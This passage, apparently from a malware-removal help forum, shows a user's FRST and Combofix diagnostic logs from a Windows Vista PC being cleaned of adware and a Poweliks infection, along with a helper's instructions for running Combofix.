Description: The program FRST64.exe version 12.9.2014.0 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Problem Reports and Solutions control panel.
Process ID: 3bec
Start Time: 01cfd02efc37ea2d
Termination Time: 0

Error: (09/14/2014 09:13:10 AM) (Source: .NET Runtime Optimization Service) (EventID: 1101) (User: )
Description: .NET Runtime Optimization Service (clr_optimization_v4.0.30319_64) - 1>Failed to compile: mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 . Error code = 0x80070003

Error: (09/14/2014 09:09:52 AM) (Source: MsiInstaller) (EventID: 11704) (User: NT AUTHORITY)
Description: Product: Microsoft .NET Framework 4.5.1 -- Error 1704. An installation for Microsoft .NET Framework 4 Client Profile is currently suspended.  You must undo the changes made by that installation to continue.  Do you want to undo those changes?

Error: (09/14/2014 09:05:43 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application iexplore.exe, version 9.0.8112.16448, time stamp 0x4549b14e, faulting module Flash32_15_0_0_152.ocx, version 15.0.0.152, time stamp 0x53fe7f17, exception code 0xc0000005, fault offset 0x00647827,
process id 0x1b9c, application start time 0xiexplore.exe0.

Error: (09/14/2014 09:03:57 AM) (Source: .NET Runtime Optimization Service) (EventID: 1101) (User: )
Description: .NET Runtime Optimization Service (clr_optimization_v4.0.30319_32) - Failed to compile: System.Design, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a . Error code = 0x80070020

Error: (09/14/2014 09:03:27 AM) (Source: .NET Runtime Optimization Service) (EventID: 1101) (User: )
Description: .NET Runtime Optimization Service (clr_optimization_v4.0.30319_32) - Failed to compile: System.Data.SqlXml, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 . Error code = 0x80070020

Error: (09/14/2014 09:01:55 AM) (Source: .NET Runtime Optimization Service) (EventID: 1101) (User: )
Description: .NET Runtime Optimization Service (clr_optimization_v4.0.30319_32) - Failed to compile: System.Web.RegularExpressions, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a . Error code = 0x80070020

Error: (09/14/2014 09:01:51 AM) (Source: .NET Runtime Optimization Service) (EventID: 1101) (User: )
Description: .NET Runtime Optimization Service (clr_optimization_v4.0.30319_32) - Failed to compile: System.Design, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a . Error code = 0x80070020

Error: (09/14/2014 09:01:40 AM) (Source: .NET Runtime Optimization Service) (EventID: 1101) (User: )
Description: .NET Runtime Optimization Service (clr_optimization_v4.0.30319_32) - Failed to compile: System.Data, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 . Error code = 0x80070020

Error: (09/14/2014 09:01:34 AM) (Source: .NET Runtime Optimization Service) (EventID: 1101) (User: )
Description: .NET Runtime Optimization Service (clr_optimization_v4.0.30319_32) - Failed to compile: System.Web, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a . Error code = 0x80070020

System errors:
=============
Error: (09/14/2014 08:58:20 AM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (09/14/2014 08:55:25 AM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: SASDIFSV
SASKUTIL

Error: (09/14/2014 08:49:31 AM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: SASDIFSV
SASKUTIL

Error: (09/14/2014 08:49:06 AM) (Source: EventLog) (EventID: 6008) (User: )
Description: The previous system shutdown at 8:45:33 AM on 9/14/2014 was unexpected.

Error: (09/14/2014 07:31:20 AM) (Source: Service Control Manager) (EventID: 7022) (User: )
Description: KtmRm for Distributed Transaction Coordinator

Error: (09/14/2014 07:31:11 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Windows Modules Installer%%1053

Error: (09/14/2014 07:31:11 AM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: 30000Windows Modules Installer

Error: (09/14/2014 07:30:42 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Windows Modules Installer%%1053

Error: (09/14/2014 07:30:42 AM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: 30000Windows Modules Installer

Error: (09/14/2014 07:30:41 AM) (Source: DCOM) (EventID: 10005) (User: )
Description: 1053TrustedInstaller{752073A1-23F2-4396-85F0-8FDB879ED0ED}

Microsoft Office Sessions:
=========================
Error: (03/25/2010 03:52:13 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6514.5000, Microsoft Office Version: 12.0.6425.1000. This session lasted 439 seconds with 420 seconds of active time.  This session ended with a crash.

Error: (03/25/2010 03:44:34 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6514.5000, Microsoft Office Version: 12.0.6425.1000. This session lasted 273 seconds with 240 seconds of active time.  This session ended with a crash.

Error: (03/24/2010 09:30:25 AM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6514.5000, Microsoft Office Version: 12.0.6425.1000. This session lasted 503 seconds with 480 seconds of active time.  This session ended with a crash.

CodeIntegrity Errors:
===================================
  Date: 2014-09-14 09:22:19.811
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.

  Date: 2014-09-14 09:22:19.686
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.

  Date: 2014-09-14 09:22:19.561
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.

  Date: 2014-09-14 09:22:19.436
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.

  Date: 2014-09-14 09:22:19.249
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.

  Date: 2014-09-14 09:22:19.109
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.

  Date: 2014-09-14 09:22:18.968
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.

  Date: 2014-09-14 09:22:18.844
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.

  Date: 2014-09-14 09:19:28.745
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.

  Date: 2014-09-14 09:19:28.589
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.

==================== Memory info ===========================

Processor: Intel® Core™ i7 CPU 950 @ 3.07GHz
Percentage of memory in use: 43%
Total physical RAM: 9206.2 MB
Available physical RAM: 5247.47 MB
Total Pagefile: 18431.2 MB
Available Pagefile: 14608.63 MB
Total Virtual: 8192 MB
Available Virtual: 8191.87 MB

==================== Drives ================================

Drive c: (HP) (Fixed) (Total:916.01 GB) (Free:657.98 GB) NTFS ==>[Drive with boot components (obtained from BCD)]
Drive d: (FACTORY_IMAGE) (Fixed) (Total:15.5 GB) (Free:2.2 GB) NTFS ==>[System with boot components (obtained from reading drive)]

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 931.5 GB) (Disk ID: 1549F232)
Partition 1: (Active) - (Size=916 GB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=15.5 GB) - (Type=07 NTFS)

==================== End Of Log ============================



#3 aharonov

  • Malware Response Team

Posted 14 September 2014 - 01:03 PM

Hi there,

please run Combofix:


Please download Combofix (by sUBs) and save it to your Desktop.
  • Disable the real-time protection of your antivirus and anti-malware programs because they might interfere with the scan.
  • Start Combofix.exe and follow its instructions.
  • Do not use the computer while the scan is running. This may cause the program to stall.
  • When finished, a log file will be displayed (that can also be found at C:\Combofix.txt).
    Please copy and paste the contents of this file into your next post.
Note: If you receive an error "Illegal operation attempted on a registry key that has been marked for deletion." after the scan, just restart the computer.
(You can find more detailed instructions in this guide on using Combofix.)

#4 mleehogg

  • Topic Starter

  • Members

Posted 15 September 2014 - 11:50 AM

Thanks for helping. Here are the Combofix logs:

ComboFix 14-09-14.01 - Hogg 09/15/2014   8:59.1.8 - x64
Microsoft® Windows Vista™ Home Premium   6.0.6002.2.1252.1.1033.18.9206.5865 [GMT -6:00]
Running from: c:\users\Hogg\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\J5LL7X0R\ComboFix.exe
AV: Norton Internet Security *Disabled/Updated* {D87FA2C0-F526-77B1-D6EC-0EDF3936CEDB}
FW: Norton Internet Security *Disabled* {E04423E5-BF49-76E9-FDB3-A7EAC7E589A0}
SP: IObit Malware Fighter *Disabled/Updated* {A751AC20-3B48-5237-898A-78C4436BB78D}
SP: Norton Internet Security *Disabled/Updated* {631E4324-D31C-783F-EC5C-35AD42B18466}
SP: Windows Defender *Enabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
.
(((((((((((((((((((((((((((((((((((((((   Other Deletions   )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
C:\0.bak
C:\END
C:\prefs.js
c:\program files (x86)\Search Guard Plus
c:\program files (x86)\Search Guard Plus\fbsProtection.xml
c:\program files (x86)\Search Guard Plus\fbsProtectionI.xml
c:\program files (x86)\Search Guard Plus\fbsSearchProvider.xml
c:\program files (x86)\Search Guard Plus\FbsSearchProviderIE8.exe
c:\program files (x86)\Search Guard Plus\SearchGuardPlus.ico
c:\program files (x86)\Search Guard Plus\uninstalSGP.exe
c:\program files (x86)\Search Guard PlusU
c:\program files (x86)\Search Guard PlusU\SGPU.ico
c:\program files (x86)\Search Guard PlusU\sgpUpdater.exe
c:\program files (x86)\Search Guard PlusU\sgpUpdater.xml
c:\program files (x86)\Search Guard PlusU\sgpUpdaters.exe
c:\program files (x86)\Search Guard PlusU\uninstalSGPU.exe
c:\program files (x86)\SGPSA
c:\program files (x86)\SGPSA\BHO.dll
c:\program files (x86)\SGPSA\ie3sh.exe
c:\program files (x86)\SGPSA\SearchAssistant.dll
c:\programdata\1381175560
c:\programdata\1920547364
c:\programdata\7z6ge.pad
c:\programdata\ism_0_llatsni.pad
c:\programdata\ras_0oed.pad
c:\programdata\SysWoW32
c:\programdata\SysWoW32\@u1482234626v0
c:\programdata\SysWoW32\@u1482234626v1
c:\programdata\SysWoW32\@u1482234626v2
c:\programdata\SysWoW32\@u1482234626v3
c:\programdata\SysWoW32\@u1482234626v4
c:\programdata\SysWoW32\@u1482234626v5
c:\programdata\SysWoW32\@u1482234626v6
c:\programdata\SysWoW32\@u1482234626v7
c:\programdata\SysWoW32\_u1482234626v0
c:\programdata\SysWoW32\_u1482234626v1
c:\programdata\SysWoW32\_u1482234626v2
c:\programdata\SysWoW32\_u1482234626v3
c:\programdata\SysWoW32\_u1482234626v4
c:\programdata\SysWoW32\_u1482234626v5
c:\programdata\SysWoW32\_u1482234626v6
c:\programdata\SysWoW32\_u1482234626v7
c:\programdata\SysWoW32\mu1482234626v4
c:\programdata\SysWoW32\mu1482234626v4.kwd
c:\programdata\SysWoW32\mu1482234626v5
c:\programdata\SysWoW32\mu1482234626v5.kwd
c:\programdata\SysWoW32\mu1482234626v6
c:\programdata\SysWoW32\mu1482234626v6.kwd
c:\programdata\SysWoW32\mu1482234626v7
c:\programdata\SysWoW32\mu1482234626v7.kwd
c:\programdata\SysWoW32\wu1482234626v0
c:\programdata\SysWoW32\wu1482234626v0.kwd
c:\programdata\SysWoW32\wu1482234626v1
c:\programdata\SysWoW32\wu1482234626v1.kwd
c:\programdata\SysWoW32\wu1482234626v2
c:\programdata\SysWoW32\wu1482234626v2.kwd
c:\programdata\SysWoW32\wu1482234626v3
c:\programdata\SysWoW32\wu1482234626v3.kwd
c:\programdata\uninstaller.exe
c:\programdata\unrar.exe
c:\users\Hogg\AppData\Roaming\.#
c:\users\Hogg\AppData\Roaming\82034158988C.manifest
c:\users\Hogg\AppData\Roaming\82034158988O.manifest
c:\users\Hogg\AppData\Roaming\82034158988P.manifest
c:\users\Hogg\AppData\Roaming\82034158988S.manifest
c:\users\Hogg\AppData\Roaming\inst.exe
.
.
CLSID={AB8902B4-09CA-4bb6-B78D-A8F59079A8D5} - infected with Poweliks and removed.
You should verify if current CLSID data is correct:
.
HKEY_CLASSES_ROOT\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}
    (Default)    REG_SZ    Thumbnail Cache Class Factory for Out of Proc Server
    AppID    REG_SZ    {AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}
.
HKEY_CLASSES_ROOT\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\InprocServer32
    (Default)    REG_SZ    c:\windows\system32\thumbcache.dll
    ThreadingModel    REG_SZ    Apartment
.
.
(((((((((((((((((((((((((   Files Created from 2014-08-15 to 2014-09-15  )))))))))))))))))))))))))))))))
.
.
2014-09-15 15:57 . 2014-09-15 15:57 -------- d-----w- c:\users\Hogg\AppData\Local\temp
2014-09-15 15:57 . 2014-09-15 15:57 -------- d-----w- c:\users\Default\AppData\Local\temp
2014-09-15 15:56 . 2014-09-15 15:56 -------- d-----w- c:\users\Guest\AppData\Local\temp
2014-09-14 15:18 . 2014-09-14 15:25 -------- d-----w- C:\FRST
2014-09-14 15:10 . 2014-09-14 15:10 -------- d-----w- c:\windows\Migration
2014-09-14 15:08 . 2014-09-14 15:08 -------- d-----w- c:\programdata\WindowsSearch
2014-09-14 14:45 . 2014-09-14 14:45 -------- d-----w- C:\a400f61a0bb2614026ab8a56ec
2014-09-14 14:36 . 2014-06-26 22:17 171152 ----a-w- c:\windows\system32\infocardapi.dll
2014-09-14 14:36 . 2014-06-26 22:17 1389200 ----a-w- c:\windows\system32\icardagt.exe
2014-09-14 14:36 . 2014-06-26 22:17 99480 ----a-w- c:\windows\SysWow64\infocardapi.dll
2014-09-14 14:36 . 2014-06-26 22:17 8856 ----a-w- c:\windows\SysWow64\icardres.dll
2014-09-14 14:36 . 2014-06-26 22:17 619664 ----a-w- c:\windows\SysWow64\icardagt.exe
2014-09-14 14:36 . 2014-06-26 22:17 8848 ----a-w- c:\windows\system32\icardres.dll
2014-09-14 14:35 . 2014-06-06 04:29 35480 ----a-w- c:\windows\system32\TsWpfWrp.exe
2014-09-14 14:35 . 2014-06-06 04:28 35480 ----a-w- c:\windows\SysWow64\TsWpfWrp.exe
2014-09-14 14:10 . 2014-09-14 14:10 -------- d-----w- c:\programdata\IObit
2014-09-14 14:09 . 2014-09-14 14:09 -------- d-----w- c:\users\Hogg\AppData\Roaming\IObit
2014-09-14 14:09 . 2014-09-14 14:09 -------- d-----w- c:\program files (x86)\IObit
2014-09-14 14:02 . 2014-09-14 14:19 -------- d-----w- c:\windows\system32\MRT
2014-09-13 17:20 . 2014-09-13 17:20 75888 ----a-w- c:\programdata\Microsoft\Windows Defender\Definition Updates\{2193F8B5-2287-453A-BDBC-78C716D0DFF1}\offreg.dll
2014-09-13 17:00 . 2014-06-02 21:30 3137536 ----a-w- c:\windows\system32\msi.dll
2014-09-13 16:53 . 2014-08-21 17:24 11319192 ----a-w- c:\programdata\Microsoft\Windows Defender\Definition Updates\{2193F8B5-2287-453A-BDBC-78C716D0DFF1}\mpengine.dll
2014-09-13 15:00 . 2014-09-13 15:16 -------- d-----w- C:\TDSSKiller_Quarantine
2014-09-12 01:45 . 2014-09-14 14:01 122584 ----a-w- c:\windows\system32\drivers\MBAMSwissArmy.sys
2014-09-12 01:45 . 2014-09-13 16:33 -------- d-----w- c:\program files (x86)\Malwarebytes Anti-Malware
2014-09-12 01:45 . 2014-05-12 13:26 64216 ----a-w- c:\windows\system32\drivers\mwac.sys
2014-09-12 01:45 . 2014-05-12 13:26 91352 ----a-w- c:\windows\system32\drivers\mbamchameleon.sys
2014-09-10 15:12 . 2014-09-10 15:12 -------- d-----w- c:\program files\iPod
2014-09-10 15:12 . 2014-09-10 15:12 -------- d-----w- c:\programdata\34BE82C4-E596-4e99-A191-52C6199EBF69
2014-09-10 15:12 . 2014-09-10 15:12 -------- d-----w- c:\program files\iTunes
2014-09-10 15:12 . 2014-09-10 15:12 -------- d-----w- c:\program files (x86)\iTunes
2014-08-29 16:04 . 2014-08-29 16:05 -------- d--h--w- c:\programdata\{698E0848-6D29-4305-80DC-E8D609260CE2}
2014-08-16 16:09 . 2014-09-09 02:24 -------- d-----w- c:\users\Hogg\AppData\Local\Adobe
.
.
.
((((((((((((((((((((((((((((((((((((((((   Find3M Report   ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2014-09-12 14:08 . 2012-04-01 16:36 701104 ----a-w- c:\windows\SysWow64\FlashPlayerApp.exe
2014-09-12 14:08 . 2012-02-05 18:03 71344 ----a-w- c:\windows\SysWow64\FlashPlayerCPLApp.cpl
2014-09-01 14:59 . 2010-06-24 17:33 23256 ----a-w- c:\programdata\Microsoft\IdentityCRL\production\ppcrlconfig600.dll
2014-08-29 19:01 . 2006-11-02 12:35 101694776 ----a-w- c:\windows\system32\mrt.exe
2014-08-25 12:53 . 2009-10-07 13:01 270496 ------w- c:\windows\system32\MpSigStub.exe
2014-08-12 05:19 . 2013-08-19 15:43 50976 ----a-w- c:\windows\system32\drivers\avgtpx64.sys
2014-07-28 20:52 . 2014-07-28 20:52 6112072 ----a-w- c:\windows\system32\usbaaplrc.dll
2014-07-28 20:52 . 2014-07-28 20:52 54784 ----a-w- c:\windows\system32\drivers\usbaapl64.sys
.
.
(((((((((((((((((((((((((((((((((((((   Reg Loading Points   ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\~\Browser Helper Objects\{95B7759C-8C7F-4BF1-B163-73684A933233}]
2014-08-25 22:17 3627032 ----a-w- c:\program files (x86)\AVG SafeGuard toolbar\18.1.9.799\AVG SafeGuard toolbar_toolbar.dll
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Toolbar]
"{95B7759C-8C7F-4BF1-B163-73684A933233}"= "c:\program files (x86)\AVG SafeGuard toolbar\18.1.9.799\AVG SafeGuard toolbar_toolbar.dll" [2014-08-25 3627032]
.
[HKEY_CLASSES_ROOT\clsid\{95b7759c-8c7f-4bf1-b163-73684a933233}]
[HKEY_CLASSES_ROOT\AVG SafeGuard toolbar.PugiObj.1]
[HKEY_CLASSES_ROOT\AVG SafeGuard toolbar.PugiObj]
.
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"swg"="c:\program files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe" [2009-08-12 39408]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run]
"vProt"="c:\program files (x86)\AVG SafeGuard toolbar\vprot.exe" [2014-08-25 2640408]
"APSDaemon"="c:\program files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe" [2014-07-31 43816]
"TkBellExe"="c:\program files (x86)\real\realplayer\Update\realsched.exe" [2013-10-23 295512]
"Adobe ARM"="c:\program files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe" [2013-11-21 959904]
"iTunesHelper"="c:\program files (x86)\iTunes\iTunesHelper.exe" [2014-09-01 152392]
"IObit Malware Fighter"="c:\program files (x86)\IObit\IObit Malware Fighter\IMF.exe" [2013-05-14 1486144]
.
c:\programdata\Microsoft\Windows\Start Menu\Programs\Startup\
McAfee Security Scan Plus.lnk - c:\program files\McAfee Security Scan\3.8.141\SSScheduler.exe [2014-1-15 329944]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"ConsentPromptBehaviorAdmin"= 5 (0x5)
"ConsentPromptBehaviorUser"= 3 (0x3)
"EnableUIADesktopToggle"= 0 (0x0)
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows nt\currentversion\windows]
"LoadAppInit_DLLs"=1 (0x1)
.
[HKEY_LOCAL_MACHINE\system\currentcontrolset\control\session manager]
BootExecute REG_MULTI_SZ    autocheck autochk *\0bootdelete
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\89540304.sys]
@="Driver"
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\hitmanpro36]
@=""
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\hitmanpro36.sys]
@=""
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\HitmanPro36Crusader]
@=""
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\HitmanPro36CrusaderBoot]
@=""
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\IMFservice]
@="Service"
.
R4 AdobeActiveFileMonitor7.0;Adobe Active File Monitor V7;c:\program files (x86)\Adobe\Photoshop Elements 7.0\PhotoshopElementsFileAgent.exe;c:\program files (x86)\Adobe\Photoshop Elements 7.0\PhotoshopElementsFileAgent.exe [x]
.
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows nt\currentversion\svchost]
hpdevmgmt REG_MULTI_SZ    hpqcxs08 hpqddsvc
.
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Svchost  - NetSvcs
Themes
ezSharedSvc
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\active setup\installed components\{8A69D345-D564-463c-AFF1-A69D9E530F96}]
2014-09-13 19:46 1096520 ----a-w- c:\program files (x86)\Google\Chrome\Application\37.0.2062.120\Installer\chrmstp.exe
.
Contents of the 'Scheduled Tasks' folder
.
2014-09-15 c:\windows\Tasks\Adobe Flash Player Updater.job
- c:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2012-04-01 14:08]
.
2014-09-14 c:\windows\Tasks\FacebookUpdateTaskUserS-1-5-21-764796802-3477399101-373240229-1000Core.job
- c:\users\Hogg\AppData\Local\Facebook\Update\FacebookUpdate.exe [2012-05-24 23:35]
.
2014-09-14 c:\windows\Tasks\FacebookUpdateTaskUserS-1-5-21-764796802-3477399101-373240229-1000UA.job
- c:\users\Hogg\AppData\Local\Facebook\Update\FacebookUpdate.exe [2012-05-24 23:35]
.
2014-09-15 c:\windows\Tasks\Foresight Software Registration3.job
- c:\windows\system32\rundll32.exe [2006-11-02 09:45]
.
2014-08-13 c:\windows\Tasks\Foresight Software Update3.job
- c:\program files (x86)\Common Files\Foresight Software\UUS3\Update3.exe [2013-06-27 21:36]
.
2014-09-15 c:\windows\Tasks\Google Software Updater.job
- c:\program files (x86)\Google\Common\Google Updater\GoogleUpdaterService.exe [2009-08-12 05:03]
.
2014-09-15 c:\windows\Tasks\GoogleUpdateTaskMachineCore.job
- c:\program files (x86)\Google\Update\GoogleUpdate.exe [2009-08-13 17:38]
.
2014-09-15 c:\windows\Tasks\GoogleUpdateTaskMachineUA.job
- c:\program files (x86)\Google\Update\GoogleUpdate.exe [2009-08-13 17:38]
.
2014-09-11 c:\windows\Tasks\Norton Security Scan for Hogg.job
- c:\progra~2\NORTON~2\Engine\410~1.28\Nss.exe [2014-04-15 10:30]
.
2014-09-15 c:\windows\Tasks\ParetoLogic Registration3.job
- c:\windows\system32\rundll32.exe [2006-11-02 09:45]
.
2014-09-15 c:\windows\Tasks\ParetoLogic Update Version3 Startup Task.job
- c:\program files (x86)\Common Files\ParetoLogic\UUS3\Pareto_Update3.exe [2013-05-23 21:53]
.
2014-09-13 c:\windows\Tasks\ParetoLogic Update Version3.job
- c:\program files (x86)\Common Files\ParetoLogic\UUS3\Pareto_Update3.exe [2013-05-23 21:53]
.
2014-08-29 c:\windows\Tasks\PC Helper 360.job
- c:\program files (x86)\Foresight Software\PC Helper 360\pch360.exe [2013-06-27 21:35]
.
2014-08-31 c:\windows\Tasks\PCDRScheduledMaintenance.job
- c:\program files\PC-Doctor for Windows\pcdr5cuiw32.exe [2009-02-02 18:59]
.
2014-07-04 c:\windows\Tasks\Privacy Controls_{028B732D-E038-11E2-BEAE-EE3C3BB92F93}.job
- c:\program files (x86)\ParetoLogic\Privacy Controls\Pareto_PC.exe [2013-05-23 21:53]
.
.
--------- X64 Entries -----------
.
.
------- Supplementary Scan -------
.
uLocal Page = c:\windows\system32\blank.htm
mStart Page = hxxp://www.google.com
mDefault_Page_URL = hxxp://ie.redirect.hp.com/svs/rdr?TYPE=3&tp=iehome&locale=en_us&c=93&bd=Pavilion&pf=cndt
mLocal Page = c:\windows\SysWOW64\blank.htm
uInternet Settings,ProxyOverride = *.local
TCP: DhcpNameServer = 209.18.47.61 209.18.47.62
Handler: viprotocol - {B658800C-F66E-4EF3-AB85-6C0C227862A9} - c:\program files (x86)\Common Files\AVG Secure Search\ViProtocolInstaller\18.1.9\ViProtocol.dll
.
- - - - ORPHANS REMOVED - - - -
.
Toolbar-10 - (no file)
Wow6432Node-HKU-Default-Run-{C41A51F9-C162-4A86-AEA9-955929DA2DAE} - c:\users\Hogg\AppData\Local\{472011AB-211B-4DA4-8CDF-9AD275078570}\{C41A51F9-C162-4A86-AEA9-955929DA2DAE}\cgpgoheo.dll
Toolbar-10 - (no file)
WebBrowser-{5B291E6C-9A74-4034-971B-A4B007A0B315} - (no file)
WebBrowser-{B7DE27CA-0626-478A-95D6-6C0804782455} - (no file)
HKLM-Run-SmartMenu - c:\program files (x86)\Hewlett-Packard\HP MediaSmart\SmartMenu.exe
.
.
.
[HKEY_LOCAL_MACHINE\system\ControlSet001\Services\NIS]
"ImagePath"="\"c:\program files (x86)\Norton Internet Security\Engine\20.5.0.28\ccSvcHst.exe\" /s \"NIS\" /m \"c:\program files (x86)\Norton Internet Security\Engine\20.5.0.28\diMaster.dll\" /prefetch:1"
.
[HKEY_LOCAL_MACHINE\system\ControlSet001\Services\PCDSRVC{F36B3A4C-F95654BD-06000000}_0]
"ImagePath"="\??\c:\program files\pc-doctor for windows\pcdsrvc_x64.pkms"
.
--------------------- LOCKED REGISTRY KEYS ---------------------
.
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}]
@Denied: (A 2) (Everyone)
@="FlashBroker"
"LocalizedString"="@c:\\Windows\\system32\\Macromed\\Flash\\FlashUtil64_15_0_0_152_ActiveX.exe,-101"
.
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\Elevation]
"Enabled"=dword:00000001
.
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\LocalServer32]
@="c:\\Windows\\system32\\Macromed\\Flash\\FlashUtil64_15_0_0_152_ActiveX.exe"
.
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
.
[HKEY_LOCAL_MACHINE\software\Classes\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}]
@Denied: (A 2) (Everyone)
@="IFlashBroker6"
.
[HKEY_LOCAL_MACHINE\software\Classes\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}\ProxyStubClsid32]
@="{00020424-0000-0000-C000-000000000046}"
.
[HKEY_LOCAL_MACHINE\software\Classes\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
"Version"="1.0"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}]
@Denied: (A 2) (Everyone)
@="FlashBroker"
"LocalizedString"="@c:\\Windows\\SysWOW64\\Macromed\\Flash\\FlashUtil32_15_0_0_152_ActiveX.exe,-101"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\Elevation]
"Enabled"=dword:00000001
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\LocalServer32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\FlashUtil32_15_0_0_152_ActiveX.exe"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}]
@Denied: (A 2) (Everyone)
@="Shockwave Flash Object"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\InprocServer32]
